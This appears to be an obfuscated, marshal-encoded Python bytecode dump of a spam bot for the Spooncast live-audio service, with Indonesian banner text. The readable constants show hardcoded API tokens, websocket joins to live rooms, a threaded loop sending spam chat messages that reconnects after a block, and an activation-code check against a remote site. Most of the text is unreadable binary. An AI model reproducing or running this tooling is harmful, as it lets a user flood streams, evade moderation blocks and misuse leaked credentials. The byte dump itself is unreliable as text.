7fb4fe00a5731eZ(0958bdf41c60a8517441a7781dd3683fabd1e569Z(9912decdd8a6b7664f4268b520b21817e137bac2Z(bca6b642b18fc777d450714cdc37c6a8e63e7a5bZ(5dbd83c9730302acd287ad8061635cbff40f7b9eZ(abe5e994658533204ee9150957be2ef2e6fd7b7aZ(769142c01bdb8e2e21cfa8a837428dcd24eba0e1Z(9ad87b8b98b3cfff0fe6e0ebcb29dc0b6b2f90b7Z(81bf7ffc3a273f0424412971f8b2b0cdec43c6b8Z(f6a52af6f5af3f081aa7ee121eb0db721830a587Z(a59dd850a75bf735adc079d6aeb468cfbd8cc2f1Z(e6104239e8d53d133f9b79b3536234b5d577187bZ(8c65e50923c60c3df05ef048256d27b0d20f3c12Z(7fb03337e72dc351209c69fd88d4eb8b8513c0b1Z(83ec91d286d5a9aa961864905fa04249d13d494bZ(0d0038c514400df8f54222f1b1d237e53301d444Z(75b67e43e118f7c057123c559a1e368bbadb7a8dZ(a94b13c143335570b9e7c2dfa3e5aa8c61d807aaZ(ce7c9a02baaace428dd3dbf37d3c13570b10f636Z(35e803edd263e4aab29b260dba27c0d6c7fbe9ceZ(310d117daf03dfb57fd347d2769db7ed3bcea79fZ(e695f2a1a88a1e415b0a69b209ca4a538cf18df5Z(205aea8a7233425c029276abe6224e4df7170e85Z(0eaa409eba6759c9303741b32638d509a97311e2Z(01a3da48645562b0a1e2e0d50ac5ad7986f6f804Z(ba6290507f2d01197cd23c9335424159e7caec67Z(7c1f3082db36dda7f1c4194c7b8794006f939cf8Z(c9fb296a62a3dfb00e2d27becebef95a7822ebe4Z(be21b9fa029107d6131296b9198ad7195b33ffc4Z(953539ae7e63f1727092982540902cabb8cedd46Z(49
46a492fec793132de02298c5877c4046831c48Z(0985828b3f66ad9d008151699331e7d4b7dec151Z(e64bac7fb45eedd1aa826cc4b0838639107fd56aZ(8a00d32178fd553153f6d7a767a239fbca1886cfZ(9246c55a551d67c2462108141f0e5bac4991a517Z(6fcd13983a0142ae804573e34b00904550f574e3Z(2d34a278494f58a5ebb3e67e5a3e12db43b5034bZ(c0ecb8b04d88d5eb49b2373bc16c923ced29c524Z(0eadf1894c07a97244f7ccf84cec1b132cba976cZ(32a0eed4f28e961715feae1ce208c0d07f46c735Z(0ee869c0712c42ad6c8662c17aaecd19fcdf8dd1Z(b7c77a59171502e39c4bf386246384372d47043cZ(46b67351e331fe86331ab097d794cb1589a4a830Z(8b346293305e25699daebf95d14543600cfcbe05Z(a97b4fedec07580b1b3a9c1f9cc00e2e4b7ce4e8Z(cb92f75c76602dae7478fa7519022512deaae9d4Z(440b33dad96b0e7f1be7054076f2cb5179032686Z(7fdee01317e66764629b44627674074cd578d242Z(69e42c08f4995d9ccb539f8ec4bcbcb0da719e3bZ(6057322086bbcac056b1220abe2cba40c56aa611Z(35e09792313363e7da3e0a0d64c987ab81fc43c5Z(6aad3d237c2bb89d2421945afec76ebd1e45f951Z(fb259d300a1e0b4f414d78d571b3a4dfa8a7f1f5Z(c0e830cd6db1d67f83d62a54a675598af3d45591Z(667ea1931450552c34bcf40f9e5c3085bafab416Z(8921300150827e6b58aebb786e0d0f7fa1225f0eZ(f6fdf91cff0c63b909c45a0b3519c54f5fe3eb65Z(ca353f6ca3b9b4f1a5b12f4e875e61478682fca9Z(44eb50e19d565eff8cc9490a54269bfe2b2e35f5Z(1748ea2ed743bb30dabd3ad781ac43aa675c0070Z(3a23ba9f94eda441a41022923ae758f108b5b0cbZ(bfc497beafb62e5daa6f46e3fbbeec9b9a1932b1Z(23008ab0165eca0e22ac3edf2ef99f6c4c1673feZ(234ff63cdc5db19a4d8c7ebc4fc1814918c2fe94Z(1a620e8563dc1c7b05d3d92a1b41daefb16a721bZ(0ca359d8f14fcec9a9fc1f6d9e5334706e260438Z(5b1665a5166c3e8151cb359be5b9e5f52d1c33ffZ(d2cad024e4efae0d62d3243c132044bb57efe38fZ(8a10ad00ac70cea5c403725c6376ab61e1c263daZ(4be632cefd894ef37a93605383389d1693648e76Z(ea6fce6d0d9d47573123d44ab2726b2bb661dcccZ(e0a73368d1cfe253f5112c42518a197706d879f2Z(a273d745616c65b33cbd48e2f40fbe9fa51a0193Z(faf5e91f391565d0a96c5f8399ae04a97c7a2d90Z(35504899a6a87d63de8410a416e9d6288c9ead60Z(bfd7e29e08b8ca6628f0db6a90ecef5d8ccf3121Z(1d5e3136981b32ecb2949d84a0f930a92a9f8891Z(dcde4de30c7899321308defda0a70fe7d922921dZ(1868c239787d73e3d2740899a45ce6f5a1450bf9Z(582265366196ef856292ce52caa4403e53f1fa35Z(f1455b00d12b5419a9b580fcfd028cce998056e4Z(a0683f0f3fc91ebacb08c993b440392b2d225689Z(9899ac8c90cf0e5bc9b3bb327160e438a6b6214fZ(ee0db639f8b3e74ddea3e45c1bfa3bf7bfcaed24Z(8898066bd789638d4bdfc5e3cbdb4bbaa0972104Z(68e6f10a7ac0ce82e25007b3118a224ef6e4b4a1Z(7c279d694095c68035f7f365f284d73923bade0eZ(f50009bfc0ad907f6eda4aa52d96f737caf53be5Z(fb9b218b2b72ff05f5bebad334a7f80b5cdfafa4Z(752cba16e82b5a97822b81f72e3fc2b33fd9b99fZ(b674226dfae89b236add16b2c7df259df380ccc7Z(d467cc6b0bff0054b63b165b24f8af3d0af9602fZ(dc9c9d6c9ed226e02b84115618ab99512bdc77caZ(90c5cc0880c7dd04a20c6a5e2a197f3a01a99d74Z(1099c25fa3b5d607ea1c18165f4b64a72322c440Z(840b720f7c3f3a0e41d04cf2b700bb891805c91dZ(4c31294dc67b5d0669ce1df42fc01362b1b371abZ(a3297d55064ae46ed06892133c342e91df724cb5Z(ee64427066f50170293ea1102fd37b4d035282fbZ(1845ef553445aafe2fcee7bac5005b84044b9db7Z(56cc8c8f42e17523d1baf6efb400b8e9d5e1a1c4Z(4fe8d359aae539007b08888a47dd22e92aa46780Z(4ce1e3cdcfd21ec5ca57148d1ccb3e90c7d51e54Z(8aba4c81ad709b20944c4ee2363d13a7bd9dcebcZ(7d55a161732b472aeb054807b091783654386009Z(3e6065a767e9e8aa5d0b560fe5d6a4b8f3e3b7bbZ(6d1a8a2fd2d154dc1eb97e61ba356635b8c4aac7Z(3570107f623c545f6053acbc1479538f9518d652Z(cf3231fb3dc2e1bfee17f0a48b333f99889692c6Z(b9bd71ae4b6714cc9cfa2edd1ebf21077a9efc16Z(2632f430e3313782b2174d61aae30c3b01e64d2aZ(a28494e7770f062d8f641d8e3c13ecd68a43ade1Z(8fe2d160c20bc3b782f84952e43ad9cc251dea87Z(f2631bbdd75355ca9872ddad1119a2fc9738050aZ(f96916bcc4d2b5b3d2ddf282f763a
4908aa11cacZ(1faf226217de0f5dd95dea38c951f46715167338Z(bd8aefe8ac2c917d9a9c8698c866207880d9f43bZ\t210952568Z\t211666779Z\t211666796Z\t210986817Z\t211666926Z\t210991267Z\t211928532Z\t212155151Z\t212155171Z\t212155195Z\t212155336Z\t212155447Z\t212155476Z\t211932351Z\t211932300Z\t211891521Z\t211926810Z\t212276640Z\t212276652Z\t212276660Z\t212276667Z\t212276680Z\t212088228Z\t212216426Z\t212216471Z\t212216525Z\t212216607Z\t211739827Z\t212216666Z\t211928155Z\t212218056Z\t212284374Z\t212284401Z\t212284411Z\t212284456Z\t212284472Z\t212284478Z\t212284488Z\t212284559Z\t212284612Z\t212284634Z\t212284655Z\t212284674Z\t212284685Z\t212284753Z\t212284880Z\t212284888Z\t212288338Z\t212288348Z\t212288356Z\t212288369Z\t212288379Z\t212288396Z\t212288421Z\t212288432Z\t211524168Z\t211524205Z\t211492108Z\t211495701Z\t211495753Z\t211495795Z\t211467950Z\t211468011Z\t211468342Z\t211468440Z\t211468476Z\t211468500Z\t211469937Z\t211454531Z\t211454565Z\t211454712Z\t211421338Z\t211421764Z\t211421443Z\t211421932Z\t211421943Z\t211651986Z\t211652047Z\t211652083Z\t211652104Z\t211652109Z\t211652380Z\t211652225Z\t211652394Z\t211652434Z\t211652446Z\t211652469Z\t211652487Z\t211652696Z\t211652938Z\t211653001Z\t211460000Z\t210887962Z\t211460128Z\t210814565Z\t210888121Z\t210888136Z\t211460167Z\t211460246Z\t211653281Z\t211653744Z\t211653734Z\t211655322Z\t211655459Z\t211655379Z\t211651970Z\t211651988Z\t211652010Z\t211652025Z\t211652040Z\t211651933Z\t211651944Z\t211652086Z\t211652107Z\t211652139Z\t211652218Z\t211652247Z\t211652259Z\t211655690Z\t211652277Z\t211652335Z\t211654301Z\t211654391Z\t211654449Z\t211510287Z\t211655771Z\t211511379Z\t211660668Z\t211660710Z\t210946801T\xe9\x01\x00\x00\x00Z\x05tidurZ\x03xyxZ\x03xyzz\r{"div":"hai"}\xe9\x0f\x00\x00\x00F\xe9\x03\x00\x00\x00Z\x05jsjajZ\x04lagu\xda\x00Z\x03xwxc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sB\x00\x00\x00t\x00\xa0\x01d\x01\xa1\x01\x01\x00t\x02d\x02\x83\x01\x01\x00t\x02d\x03\x83\x01\x01\x00t\x02d\x04\x83\x01\x01\x00t\x02t\x03\xa0\x04\xa1\x00\x83\x01\x01\x00t\x02d\x05\x83\x01\x01\x00t\x02d\x06\x83\x01\x01\x00d\x00S\x00)\x07N\xda\x05clearz-\x1b[1;33;42mDibuat Oleh Wibu :v yang suka oppai\xf5\r\x00\x00\x00with love \xe2\x9d\xa4\xfa\x12CP : 085155415154\nz\rVERSI : vvvip\xfa\x0b\x1b[1;37;40m\n\xa9\x05\xda\x02os\xda\x06system\xda\x05printr\x03\x00\x00\x00Z\x03now\xa9\x00r\x12\x00\x00\x00r\x12\x00\x00\x00r\t\x00\x00\x00\xda\x05signa\x82\x01\x00\x00s\x0e\x00\x00\x00\x00\x02\n\x02\x08\x01\x08\x01\x08\x01\x0c\x01\x08\x02r\x13\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sJ\x00\x00\x00t\x00\xa0\x01d\x01\xa1\x01\x01\x00t\x02d\x02\x83\x01\x01\x00t\x02d\x03\x83\x01\x01\x00t\x02d\x04\x83\x01\x01\x00t\x02t\x03\xa0\x04\xa1\x00\x83\x01\x01\x00t\x02d\x05\x83\x01\x01\x00t\x02|\x00\x83\x01\x01\x00t\x02d\x06\x83\x01\x01\x00d\x00S\x00)\x07Nr\n\x00\x00\x00z(\x1b[1;34;42mDibuat Oleh Wibu Tachi Dayo :vr\x0b\x00\x00\x00r\x0c\x00\x00\x00u \x00\x00\x00VERSI : Onii Chan~ 
(~\xef\xbf\xa3\xe2\x96\xbd\xef\xbf\xa3)~r\r\x00\x00\x00r\x0e\x00\x00\x00)\x01\xda\x04pessr\x12\x00\x00\x00r\x12\x00\x00\x00r\t\x00\x00\x00\xda\x04sign\x8e\x01\x00\x00s\x10\x00\x00\x00\x00\x02\n\x02\x08\x01\x08\x01\x08\x01\x0c\x01\x08\x01\x08\x01r\x15\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s$\x00\x00\x00g\x00}\x01|\x00D\x00]\x16}\x02|\x02|\x01k\x07r\x08|\x01\xa0\x00|\x02\xa1\x01\x01\x00q\x08|\x01S\x00\xa9\x01N)\x01\xda\x06append)\x03Z\tduplicateZ\nfinal_listZ\x03numr\x12\x00\x00\x00r\x12\x00\x00\x00r\t\x00\x00\x00\xda\x06Remove\x9a\x01\x00\x00s\n\x00\x00\x00\x00\x01\x04\x01\x08\x01\x08\x01\x0c\x01r\x18\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s2\x00\x00\x00|\x00d\x01\x17\x00D\x00]$}\x01t\x00j\x01\xa0\x02|\x01\xa1\x01\x01\x00t\x00j\x01\xa0\x03\xa1\x00\x01\x00t\x04\xa0\x05d\x02\xa1\x01\x01\x00q\x08d\x00S\x00)\x03N\xda\x01\ng\n\xd7\xa3p=\n\xb7?)\x06\xda\x03sys\xda\x06stdout\xda\x05write\xda\x05flush\xda\x04time\xda\x05sleep)\x02\xda\x01s\xda\x01cr\x12\x00\x00\x00r\x12\x00\x00\x00r\t\x00\x00\x00\xda\tslowprint\xa1\x01\x00\x00s\x08\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\n\x01r"\x00\x00\x00c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s\xf0\x00\x00\x00t\x00\xa0\x01|\x01\xa1\x01}\x02t\x02t\x03\x83\x01\x01\x00t\x03d\x017\x00a\x03|\x02d\x02\x19\x00d\x03\x19\x00d\x04\x19\x00}\x03|\x02d\x02\x19\x00d\x03\x19\x00d\x05\x19\x00}\x04|\x02d\x06\x19\x00}\x05|\x05d\x07k\x02r~t\x02|\x02d\x02\x19\x00d\x08\x19\x00\x83\x01\x01\x00|\x02d\x02\x19\x00d\x08\x19\x00}\x06|\x06d\td\x00\x85\x02\x19\x00}\x07|\x07d\nk\x02r~d\x0b}\x07|\x05d\x0ck\x02r\xa2|\x02d\x02\x19\x00d\r\x19\x00}\x08|\x02d\x02\x19\x00d\x03\x19\x00d\x0e\x19\x00}\t|\x05d\x0fk\x02r\xd6|\x02d\x02\x19\x00d\x03\x19\x00d\x04\x19\x00a\x04t\x02t\x04\x83\x01\x01\x00t\x05t\x04\x83\x01t\x06k\x06r\xd6|\x00\xa0\x07\xa1\x00\x01\x00d\x10t\x08\x17\x00d\x11\x17\x00}\n|\x00\xa0\t|\n\xa1\x01\x01\x00d\x00S\x00)\x12Nr\x06\x00\x00\x00\xda\x04dataZ\x06author\xda\x02idZ\x08nicknameZ\x05eventZ\x0clive_presentZ\x07sticker\xe9\x08\x00\x00\x00Z\x07myheartz\nkado balonZ\x0clive_message\xda\x07message\xda\x03tagZ\nlive_blockz\x82{"appversion":"4.3.16","event":"live_message","token":"ce5c43e71af39a1d73ccdd82b1fa89b6feb65454","useragent":"Android","message":"z\x02"})\n\xda\x04json\xda\x05loadsr\x11\x00\x00\x00\xda\x03cou\xda\x04iddd\xda\x03str\xda\x05idbot\xda\x05close\xda\tpesanspam\xda\x04send)\x0b\xda\x02wsr&\x00\x00\x00Z\x04chatZ\x03uidZ\x04nickZ\x03evnZ\x04giftZ\x04kadoZ\x03psnr\'\x00\x00\x00Z\x06pesan2r\x12\x00\x00\x00r\x12\x00\x00\x00r\t\x00\x00\x00\xda\non_message\xa7\x01\x00\x00s,\x00\x00\x00\x00\x1f\n\x04\x08\x01\x08\x02\x10\x01\x10\x01\x08\x03\x08\x01\x10\x01\x0c\x01\x0c\x01\x08\x01\x04\x03\x08\x01\x0c\x02\x10\x02\x08\x01\x10\x01\x08\x02\x0c\x01\x08\x05\x0c\x01r2\x00\x00\x00c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x0c\x00\x00\x00t\x00|\x01\x83\x01\x01\x00d\x00S\x00r\x16\x00\x00\x00\xa9\x01r\x11\x00\x00\x00)\x02r1\x00\x00\x00\xda\x05errorr\x12\x00\x00\x00r\x12\x00\x00\x00r\t\x00\x00\x00\xda\x08on_error\xed\x01\x00\x00s\x02\x00\x00\x00\x00\x01r5\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x0c\x00\x00\x00t\x00d\x01\x83\x01\x01\x00d\x00S\x00)\x02Nz\x0e### closed 
###r3\x00\x00\x00\xa9\x01r1\x00\x00\x00r\x12\x00\x00\x00r\x12\x00\x00\x00r\t\x00\x00\x00\xda\x08on_close\xf0\x01\x00\x00s\x02\x00\x00\x00\x00\x01r7\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00s$\x00\x00\x00\x87\x00f\x01d\x01d\x02\x84\x08}\x01t\x00\xa0\x01|\x01d\x03\xa1\x02\x01\x00t\x02d\x04\x83\x01\x01\x00d\x00S\x00)\x05Nc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x17\x00\x00\x00s2\x00\x00\x00d\x01t\x00\x17\x00d\x02\x17\x00t\x01\x17\x00d\x03\x17\x00t\x02\x17\x00d\x04\x17\x00}\x01\x88\x00\xa0\x03|\x01\xa1\x01\x01\x00t\x04d\x05\x83\x01\x01\x00d\x00S\x00)\x06Nz\x0b{"live_id":z\n,"token":"z\x10","event":"live_z2join","appversion":"4.3.16","useragent":"Android"}z\x04====)\x05\xda\x05slink\xda\x06tokenl\xda\x08joinmoder0\x00\x00\x00r\x11\x00\x00\x00)\x02\xda\x04argsZ\x05pesanr6\x00\x00\x00r\x12\x00\x00\x00r\t\x00\x00\x00\xda\x03run\xf4\x01\x00\x00s\x06\x00\x00\x00\x00\x03\x1c\x01\n\x06z\x14on_open.<locals>.runr\x12\x00\x00\x00Z\x03aaa)\x03\xda\x06thread\xda\x10start_new_threadr\x11\x00\x00\x00)\x02r1\x00\x00\x00r<\x00\x00\x00r\x12\x00\x00\x00r6\x00\x00\x00r\t\x00\x00\x00\xda\x07on_open\xf3\x01\x00\x00s\x06\x00\x00\x00\x00\x01\x0c\x0b\x0c\x01r?\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x82\x00\x00\x00|\x00a\x00d\x01d\x02|\x00\x17\x00d\x03\x9c\x02}\x01t\x01j\x02d\x04t\x03\x17\x00d\x05\x17\x00d\x06\x17\x00d\x05\x17\x00t\x04|\x01d\x07\x8d\x03}\x02|\x02\xa0\x05\xa1\x00d\x08\x19\x00}\x03|\x03d\tk\x02rvt\x06\xa0\x07d\n\xa1\x01\x01\x00t\x06j\x08d\x0bt\x03\x17\x00t\tt\nt\x0bd\x0c\x8d\x04}\x04t\x0c|\x04_\x0c|\x04\xa0\r\xa1\x00\x01\x00n\x08t\x0ed\r\x83\x01\x01\x00d\x00S\x00)\x0eN\xfa\x0bMozilla/5.0z\x06Token )\x02\xfa\nUser-AgentZ\rAuthorization\xfa#https://id-api.spooncast.net/lives/\xfa\x01/\xda\x04join)\x02\xda\x06params\xda\x07headersZ\x0bstatus_code\xe9\xc8\x00\x00\x00Fz!wss://id-heimdallr.spooncast.net/)\x03r2\x00\x00\x00r5\x00\x00\x00r7\x00\x00\x00Z\x07loading)\x0fr9\x00\x00\x00\xda\x08requestsZ\x04postr8\x00\x00\x00rE\x00\x00\x00r(\x00\x00\x00\xda\twebsocketZ\x0benableTraceZ\x0cWebSocketAppr2\x00\x00\x00r5\x00\x00\x00r7\x00\x00\x00r?\x00\x00\x00Z\x0brun_foreverr\x11\x00\x00\x00)\x05Z\x06tokettrF\x00\x00\x00Z\x04ressZ\x04sttsr1\x00\x00\x00r\x12\x00\x00\x00r\x12\x00\x00\x00r\t\x00\x00\x00\xda\nmultiucing\x02\x02\x00\x00s\x14\x00\x00\x00\x00\x02\x04\x01\x0e\x01 \x01\x0c\x01\x08\x01\n\x01\x16\x01\x06\x01\n\x02rJ\x00\x00\x00\xda\x08__main__z\x13sedang mengecek ...z\x11sedang memuat ...z\x1apastikan internet aman ...z$https://diveot.site/spoon/kode8.jsonr\n\x00\x00\x00z#https://diveot.site/spoon/pesan.txt\xda\x04kodez\r../wibu/js.gmz\x02w+i\xa0\x86\x01\x00i?B\x0f\x00\xda\x01rz\x10KODE AKTIVASI = z\x14../sepun/johnson.divz\x17KODE AKTIVASI SEPUN7 = \xe92\x00\x00\x00z\x15status:sudah aktivasiz\x15status:belum aktivasi\xe9\x05\x00\x00\x00Z\x08passwordz\x0eSELAMAT DATANGg\x00\x00\x00\x00\x00\x00\xe0?Z\x05enjoyZ\x02cvZ\nheimdallr2z\x15masukkan link spoon: z\x14masukkan isi pesan: 
r@\x00\x00\x00zvtext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3)\x02rA\x00\x00\x00Z\x06accept\xe9"\x00\x00\x00i\xc5\xff\xff\xffrB\x00\x00\x00)\x01Z\x0bmax_workers)arI\x00\x00\x00r\x02\x00\x00\x00r(\x00\x00\x00r\x1e\x00\x00\x00r\x03\x00\x00\x00r=\x00\x00\x00\xda\x0bImportError\xda\x07_threadrH\x00\x00\x00Z\x06randomZ\x12concurrent.futuresr\x04\x00\x00\x00r\x05\x00\x00\x00r\x0f\x00\x00\x00r\x1a\x00\x00\x00\xda\x05tokenr-\x00\x00\x00Z\x06uproomZ\x06botoutZ\x02xzZ\x06statusZ\x04namaZ\x05judulZ\x05todayZ\x05timehZ\tresponse3Z\x08createdlZ\x05rankeZ\x05totidZ\x06countrZ\x05nurutZ\x05vocerZ\x06vocer2Z\x05json2Z\tinccountrZ\x08listlaguZ\nlagucountrZ\x05ngeupZ\x05cidddZ\x04tirur9\x00\x00\x00r+\x00\x00\x00r*\x00\x00\x00Z\x05namalZ\x06judullZ\x07timehl2r\x13\x00\x00\x00r\x15\x00\x00\x00r\x18\x00\x00\x00r"\x00\x00\x00r2\x00\x00\x00r5\x00\x00\x00r7\x00\x00\x00r?\x00\x00\x00rJ\x00\x00\x00\xda\x08__name__rL\x00\x00\x00r\x11\x00\x00\x00\xda\x03getZ\x02zzr\x10\x00\x00\x00\xda\x04textr\x14\x00\x00\x00Z\x08aktivasi\xda\x04path\xda\x06exists\xda\x04open\xda\x04fileZ\x07randint\xda\x03abcr\x1c\x00\x00\x00r,\x00\x00\x00r.\x00\x00\x00\xda\x01f\xda\x03int\xda\x04readZ\x03kod\xda\x01g\xda\x04exitZ\x02pwr\x1f\x00\x00\x00rE\x00\x00\x00\xda\x05inputZ\x05txtidr/\x00\x00\x00rF\x00\x00\x00Z\x08responseZ\x03urlr8\x00\x00\x00Z\tresponse2r:\x00\x00\x00Z\x07shuffleZ\tprocessesZ\x08executorZ\x05toketr\x17\x00\x00\x00Z\x06submitr\x12\x00\x00\x00r\x12\x00\x00\x00r\x12\x00\x00\x00r\t\x00\x00\x00\xda\x08<module>\x01\x00\x00\x00s\x84\x03\x00\x00\x08\x01\x0c\x01\x08\x01\x08\x01\x08\x01\x0c\x01\x02\x01\x0c\x01\x0e\x01\x0e\x01\x08\x01\x08\x01\x08\x01\x10\x01\x08\x01\x08\x05\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x02\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x80\x00\xba\x04\x7f\x00J\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\
x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x80\x00\xfe\x04\x7f\x00\x08\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x08\x01\x06\x01\x08\x01\x04\x01\x04\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x14\x01\x04\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x08\x03\x0c\x0c\x0c\x0c\x0c\x07\x0c\x06\x0cF\x0c\x03\x0c\x03\x0c\x0f\x0c\x0f\x0c\x05\x04\x01\n\x01\n\x01\n\x01\x0c\x01\x0c\x01\n\x01\x0e\x03\x0e\t\x16\x01\x06\x01\x0e\x01\x10\x01\x0e\x01\x08\x01\x0e\x01\x0c\x01\x12\x01\x16\x01\x0e\x01\x0c\x01\x12\x01\x08\x01\x08\x01\x08\x04\x0e\x01\x0c\x01\n\x04\n\x01\x0c\x01\x0c\x03\x06\x01\n\x01\x12\x01\x16\x01\x0e\x01\x0c\x01\x1e\x01\x08\x01\x06\x04\x08\x04\x0e\x06\n\x01\x0c\x01\x0c\x01\n\x01\x08\x03\x08\x05\x0c\x03\n\x01\n\x01\x10\x01\n\x01\x06\x01\x10\x01\x10\x01\x04\x01\x06\x02\n\x01\x04\x01\x10\x01\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x